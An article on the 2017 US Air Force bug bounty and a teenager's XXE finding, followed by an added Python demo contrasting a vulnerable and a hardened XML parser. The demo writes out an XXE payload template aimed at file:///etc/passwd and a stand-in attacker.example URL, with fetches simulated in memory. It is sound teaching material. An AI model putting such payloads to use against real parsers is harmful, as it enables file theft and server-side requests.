Look Ma, I Got a Job for Life: Teenager Hacks US Air Force in “Bug Bounty”
In April 2017, the US Department of Defense announced its “Hack the Air Force” bug bounty program, in which some 600 vetted hackers and security researchers from around the world would be invited to probe USAF cyber programs and report the security vulnerabilities they found. The bounty window itself ran from May 30 to June 23, 2017.
Marten Mickos, chief executive of HackerOne, a contractor that runs hacker programs like “Hack the Pentagon” and “Hack the Army,” asserted that “It was the most successful [DoD] bug bounty so far,” according to The Hill.
Statistics released by the USAF and HackerOne show that the Air Force bug bounty turned up more vulnerabilities than either of its predecessors: roughly 70 more than the similar Pentagon program and roughly 90 more than the Army’s.
Not all security vulnerabilities are created equal, however, and bounty payouts are scaled to severity. The “Hack the Air Force” program paid hackers $130,000 in total, about $30,000 more than the Army’s program paid out, which suggests that the Air Force hackers uncovered some severe issues rather than merely more of them.
This was also the first DoD bug bounty open to participants from outside the US, and the wider field paid off: hackers from overseas accounted for roughly 25 percent of the vulnerabilities found.
The largest award, however, went to 17-year-old Jack Cable, a high school student who earned a significant cash prize after submitting 30 valid vulnerability reports against USAF systems.
Jack took home a sizeable share of the bounty money: the Pentagon paid $130,000 in prizes in total, with individual bounties of between $1,000 and $5,000 for each security flaw.
“Two participants in the program were active duty military personnel and 33 participants came from outside the US. Top participating hackers were under 20 years old, including a 17-year-old who submitted 30 valid reports and earned the largest bounty sum during the challenge window,” the Air Force said in a statement.
In an interview with Marketplace, Cable said that the flaw that earned him his top bounty was an XML external entity (XXE) vulnerability.
“I found that I could give it a URL and the application would make a request to that website. And I was able to escalate that after working on it for a few hours into a remote code execution. So that would allow me to basically do whatever I wanted. So I could access all the user data that was on the website and I could change anything that I wanted to,” the teen stated.
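Cable’s description is the textbook XXE pattern: the attacker declares an entity whose SYSTEM identifier is a URL or file path, and a parser configured to resolve external entities fetches it and splices the result into the document, which gives the attacker a server-side request and, often, file reads. The following is an added example written for this page, not code from the article or from the Air Force application, and it uses only Python’s standard-library expat bindings. The `FAKE_RESOURCES` table, the `make_payload` helper and the `parse_report` function are constructed for illustration; the “fetched” content is an in-memory stand-in, not a real file or HTTP request. It puts the vulnerable resolver beside a hardened configuration that rejects any DOCTYPE outright.

```python
import xml.parsers.expat as expat

# Constructed stand-in for the filesystem and network a vulnerable server
# would reach out to when it resolves an external entity (not real data).
FAKE_RESOURCES = {
    "file:///etc/passwd": "root:x:0:0:root:/root:/bin/bash",
    "http://attacker.example/probe": "response from attacker-controlled host",
}


def make_payload(system_id):
    """Build a classic XXE document: an external entity pointing at system_id,
    referenced from element content so the parser expands it into the body."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE report [\n"
        f'  <!ENTITY xxe SYSTEM "{system_id}">\n'
        "]>\n"
        "<report><summary>&xxe;</summary></report>"
    )


class XxeBlocked(Exception):
    """Raised by the hardened parser when a document carries a DOCTYPE."""


def parse_report(xml_text, allow_external_entities):
    """Parse a <report> and return what the application would end up seeing.

    allow_external_entities=True mimics a resolver that fetches whatever
    SYSTEM identifier the document names (the vulnerable configuration).
    allow_external_entities=False is the hardened configuration: any DOCTYPE
    is rejected, and as a second line of defence external entity references
    are refused and external DTD subsets are never loaded.
    """
    parser = expat.ParserCreate()
    result = {"text": "", "fetched": [], "blocked": False}
    chunks = []

    def on_character_data(data):
        chunks.append(data)

    def on_external_entity_ref(context, base, system_id, public_id):
        if allow_external_entities:
            # Vulnerable behaviour: dereference the attacker's URL and splice
            # the bytes into the document. A real resolver would hand them to
            # parser.ExternalEntityParserCreate(context); appending the text
            # directly is enough to show the effect here.
            result["fetched"].append(system_id)
            chunks.append(FAKE_RESOURCES.get(system_id, ""))
            return 1  # nonzero tells expat the entity was handled
        return 0  # zero makes expat abort with an external-entity error

    def on_start_doctype(doctype_name, system_id, public_id, has_internal_subset):
        if not allow_external_entities:
            raise XxeBlocked(f"DOCTYPE '{doctype_name}' rejected")

    parser.CharacterDataHandler = on_character_data
    parser.ExternalEntityRefHandler = on_external_entity_ref
    parser.StartDoctypeDeclHandler = on_start_doctype
    if not allow_external_entities:
        # Never fetch an external DTD subset or parameter entity either.
        parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    try:
        parser.Parse(xml_text, True)
    except (XxeBlocked, expat.ExpatError):
        result["blocked"] = True
    result["text"] = "".join(chunks)
    return result


if __name__ == "__main__":
    for target in FAKE_RESOURCES:
        vuln = parse_report(make_payload(target), allow_external_entities=True)
        safe = parse_report(make_payload(target), allow_external_entities=False)
        print(f"{target}\n  vulnerable -> {vuln}\n  hardened   -> {safe}")
    benign = "<report><summary>all good</summary></report>"
    print("benign, hardened ->", parse_report(benign, allow_external_entities=False))
```

Run stand-alone, the vulnerable configuration shows the entity body replaced by the contents of the named resource and records the outbound fetch, which is exactly the “give it a URL and it makes a request” behaviour Cable describes; the hardened configuration refuses the document before any entity is resolved while still parsing the benign report normally. Rejecting DOCTYPE entirely is the same policy defusedxml applies; if the application uses lxml instead, the equivalent is `XMLParser(resolve_entities=False, no_network=True)`. The further escalation to remote code execution that Cable mentions depends on the application around the parser and is not part of this example.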
When asked why he decided to be one of the “good hackers,” Cable said, “I try to be because it’s really risky if you try to exploit vulnerabilities that you find. You could wind up in jail or be sued by different companies. The advantages of these bug counting programs are great because you get recognition from the companies, they pay you and you get to say you found a vulnerability rather than just having to hide it.”
Bug bounty programs have become increasingly popular among government entities and big companies, including Facebook, Google and Uber, that want to find and patch their security holes before attackers do.